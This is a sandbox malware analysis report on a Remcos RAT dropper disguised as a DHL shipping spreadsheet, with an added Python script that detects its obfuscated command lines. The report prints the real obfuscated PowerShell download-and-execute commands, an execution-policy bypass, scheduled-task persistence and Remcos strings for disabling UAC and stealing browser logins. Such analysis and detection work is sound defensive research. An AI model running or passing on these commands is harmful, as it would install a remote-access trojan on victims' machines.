Analysis Report Shipping Document PLBL003534.xls

Overview

General Information

Sample Name: Shipping Document PLBL003534.xls
Analysis ID: 336456
MD5: c32cd36c4ac0d06d321422080da164c8
SHA1: ded311853adf3cfc018be4f310bbfba6fcbd0357
SHA256: 74cdd5e924e15e451b3201884c8e647061d5d1e3a7e6cb88fccbb7f26878f1e2
Tags: DHL, nVpn, RAT, RemcosRAT, xls

Detection

Hidden Macro 4.0 Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected Remcos RAT
.NET source code contains potential unpacker
Bypasses PowerShell execution policy
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Document exploit detected (process start blacklist hit)
Drops PE files to the document folder of the user
Drops PE files with benign system names
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Injects a PE file into a foreign processes
Obfuscated command line found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality for read data from the clipboard
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2476 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2340 cmdline: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2908 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 912 cmdline: cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2904 cmdline: powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2940 cmdline: cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2896 cmdline: powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • sm.exe (PID: 1688 cmdline: C:\Users\user\AppData\Local\Temp\sm.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
          • schtasks.exe (PID: 2320 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
          • sm.exe (PID: 260 cmdline: C:\Users\user\AppData\Local\Temp\sm.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
          • sm.exe (PID: 2900 cmdline: C:\Users\user\AppData\Local\Temp\sm.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
          • sm.exe (PID: 752 cmdline: C:\Users\user\AppData\Local\Temp\sm.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
          • sm.exe (PID: 2112 cmdline: C:\Users\user\AppData\Local\Temp\sm.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
            • wscript.exe (PID: 2512 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' MD5: 979D74799EA6C8B8167869A68DF5204A)
              • cmd.exe (PID: 2344 cmdline: 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
                • remcos.exe (PID: 3032 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
                  • schtasks.exe (PID: 552 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp915.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
                  • remcos.exe (PID: 1084 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
                  • remcos.exe (PID: 2312 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
  • remcos.exe (PID: 852 cmdline: 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe' MD5: 35D3F86C5715649C8A4273E6A52B0B54)
  • remcos.exe (PID: 2108 cmdline: 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe' MD5: 35D3F86C5715649C8A4273E6A52B0B54)
    • schtasks.exe (PID: 1256 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp362D.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • remcos.exe (PID: 1744 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
    • remcos.exe (PID: 2396 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
    • remcos.exe (PID: 884 cmdline: C:\Users\user\AppData\Roaming\Remcos\remcos.exe MD5: 35D3F86C5715649C8A4273E6A52B0B54)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
0000000C.00000002.2198088639.0000000002291000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
0000000C.00000002.2198088639.0000000002291000.00000004.00000001.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000C.00000002.2199538688.0000000003299000.00000004.00000001.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000016.00000002.2234495030.00000000031A9000.00000004.00000001.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
[22 entries in the full report; list truncated]

Unpacked PEs

Source | Rule | Description | Author (matched strings listed beneath each row)
18.2.sm.exe.400000.1.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
18.2.sm.exe.400000.1.unpack | Remcos_1 | Remcos Payload | kevoreilly
  • 0x16510:$name: Remcos
  • 0x16888:$name: Remcos
  • 0x16de0:$name: Remcos
  • 0x16e33:$name: Remcos
  • 0x15674:$time: %02i:%02i:%02i:%03i
  • 0x156fc:$time: %02i:%02i:%02i:%03i
  • 0x16be4:$time: %02i:%02i:%02i:%03i
  • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
18.2.sm.exe.400000.1.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x166f8:$str_a1: C:\Windows\System32\cmd.exe
  • 0x16714:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x16714:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x15dfc:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x16400:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x159e0:$str_b2: Executing file:
  • 0x16798:$str_b3: GetDirectListeningPort
  • 0x16240:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x16534:$str_b5: licence_code.txt
  • 0x1649c:$str_b6: \restart.vbs
  • 0x163c0:$str_b8: \uninstall.vbs
  • 0x1596c:$str_b9: Downloaded file:
  • 0x15998:$str_b10: Downloading file:
  • 0x15690:$str_b11: KeepAlive Enabled! Timeout: %i seconds
  • 0x159fc:$str_b12: Failed to upload file:
  • 0x167d8:$str_b13: StartForward
  • 0x167bc:$str_b14: StopForward
  • 0x16330:$str_b15: fso.DeleteFile "
  • 0x16394:$str_b16: On Error Resume Next
  • 0x162fc:$str_b17: fso.DeleteFolder "
  • 0x15a14:$str_b18: Uploaded file:
27.2.remcos.exe.400000.1.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
27.2.remcos.exe.400000.1.raw.unpack | Remcos_1 | Remcos Payload | kevoreilly
  • 0x16510:$name: Remcos
  • 0x16888:$name: Remcos
  • 0x16de0:$name: Remcos
  • 0x16e33:$name: Remcos
  • 0x15674:$time: %02i:%02i:%02i:%03i
  • 0x156fc:$time: %02i:%02i:%02i:%03i
  • 0x16be4:$time: %02i:%02i:%02i:%03i
  • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
[13 entries in the full report; list truncated]

                Sigma Overview

                System Summary:

Sigma detected: Remcos
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, ProcessId: 2312, TargetFilename: C:\Users\user\AppData\Roaming\remcos\logs.dat
Sigma detected: Scheduled temp file as task from temp location
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\sm.exe, ParentImage: C:\Users\user\AppData\Local\Temp\sm.exe, ParentProcessId: 1688, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp', ProcessId: 2320
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis | Data: Command: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe'), CommandLine: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe'), CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2476, ProcessCommandLine: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe'), ProcessId: 2340
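The Startup tree and the Sigma hits above show why raw string matching on the command line is not enough: the Excel-spawned chain hides `powershell` behind cmd.exe caret escapes, hides `New-Object` behind a PowerShell backtick and splits `DownloadFile` and `Start-Sleep` into `('a'+'b')` concatenations, while persistence is a schtasks.exe task created from an XML file in the user's Temp directory. The Python script below is an added example, not part of the Joe Sandbox report or of the Sigma rules it cites. It normalises the command lines copied from the process tree (the event records are constructed for this example; the powershell.exe image path, the explorer.exe parent and the benign schtasks control event are assumptions) and then applies approximations of the Office-spawns-shell and scheduled-task-from-temp detections, plus download-cradle, `-EP bypass` and hidden-window checks, to the normalised text.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events. The first three command lines are copied
# from the report's Startup tree; the fourth is an assumed benign control that
# must not alert. Image paths for powershell.exe and explorer.exe are assumed.
SAMPLE_EVENTS = [
    {
        "parent_image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
        "image": r"C:\Windows\System32\cmd.exe",
        "cmdline": "cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt)"
                   ".('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')",
    },
    {
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; "
                   "cd ${enV`:temp};.('.'+'/sm.exe')",
    },
    {
        "parent_image": r"C:\Users\user\AppData\Local\Temp\sm.exe",
        "image": r"C:\Windows\SysWOW64\schtasks.exe",
        "cmdline": r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' "
                   r"/XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp'",
    },
    {
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\schtasks.exe",
        "cmdline": r"schtasks.exe /Create /TN 'Backup' /XML 'C:\ProgramData\backup\task.xml'",
    },
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def deobfuscate(cmdline: str) -> str:
    """Undo the three cheap tricks used by this sample: cmd.exe caret escapes,
    PowerShell backtick escapes inside barewords, and ('a'+'b') string splitting."""
    s = re.sub(r"\^(.)", r"\1", cmdline)                # po^wer^she^l^l -> powershell
    s = re.sub(r'`(?![ntr0abfv`"$])', "", s)            # nEw-oB`jecT -> nEw-oBjecT (keep real escapes)
    while _CONCAT.search(s):                            # 'Down'+'loadFile' -> 'DownloadFile'
        s = _CONCAT.sub(r"'\1\2'", s, count=1)
    return re.sub(r"\(\s*'([^']*)'\s*\)", r"'\1'", s)   # .('Start-Sleep') -> .'Start-Sleep'


def _base(path: str) -> str:
    """Lower-cased file name of an image path, tolerating surrounding quotes."""
    return PureWindowsPath(path.strip("'\"")).name.lower()


def evaluate(event: dict) -> set:
    """Return the names of the detections that fire for one process-creation event."""
    raw = event["cmdline"]
    norm = deobfuscate(raw).lower()
    hits = set()
    if norm != raw.lower():
        hits.add("command_line_obfuscation")
    if _base(event["parent_image"]) in OFFICE_APPS and _base(event["image"]) in SHELLS:
        hits.add("office_spawns_shell")
    if "powershell" in norm:
        if re.search(r"net\.webclient.*download(file|string|data)|invoke-webrequest|start-bitstransfer", norm):
            hits.add("powershell_download_cradle")
        if re.search(r"-e[xp]\w*\s+bypass", norm):      # -ep / -exec / -executionpolicy bypass
            hits.add("execution_policy_bypass")
        if re.search(r"-w(indowstyle)?\s+(1|hidden)", norm):
            hits.add("powershell_hidden_window")
    if (_base(event["image"]) == "schtasks.exe" and "/create" in norm and "/xml" in norm
            and re.search(r"\\(appdata\\local\\temp|windows\\temp)\\", norm)):
        hits.add("schtasks_xml_from_temp")
    return hits


def analyze(events) -> list:
    """Sorted detection names per event, in input order."""
    return [sorted(evaluate(e)) for e in events]


if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, analyze(SAMPLE_EVENTS)):
        print(f"{hits or ['-']}  <-  {deobfuscate(ev['cmdline'])}")
```

The download-cradle check only fires on the first event because `deobfuscate` runs first; the raw `('Down'+'loadFile')` never contains the substring `DownloadFile`, which is exactly the gap the caret and concatenation tricks are aimed at. The fourth event shows the schtasks rule keying on the XML path rather than on `/Create` alone, which keeps ordinary administrative task imports quiet.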

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Roaming\kXLgfvFKbJs.exe | ReversingLabs: Detection: 13%
Source: C:\Users\user\Documents\sm.exe | ReversingLabs: Detection: 13%
Yara detected Remcos RAT
Source: Yara match | File source: 0000000C.00000002.2198088639.0000000002291000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2199538688.0000000003299000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.2234495030.00000000031A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.2261044314.0000000003209000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.2260325440.0000000002201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.2234270949.0000000003399000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.2233279859.00000000021A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: sm.exe PID: 2112, type: MEMORY
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 884, type: MEMORY
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 2312, type: MEMORY
Source: Yara match | File source: 18.2.sm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.sm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 18.2.sm.exe.400000.1.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 34.2.remcos.exe.400000.1.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 27.2.remcos.exe.400000.1.unpack | Avira: Label: BDS/Backdoor.Gen
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$
basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV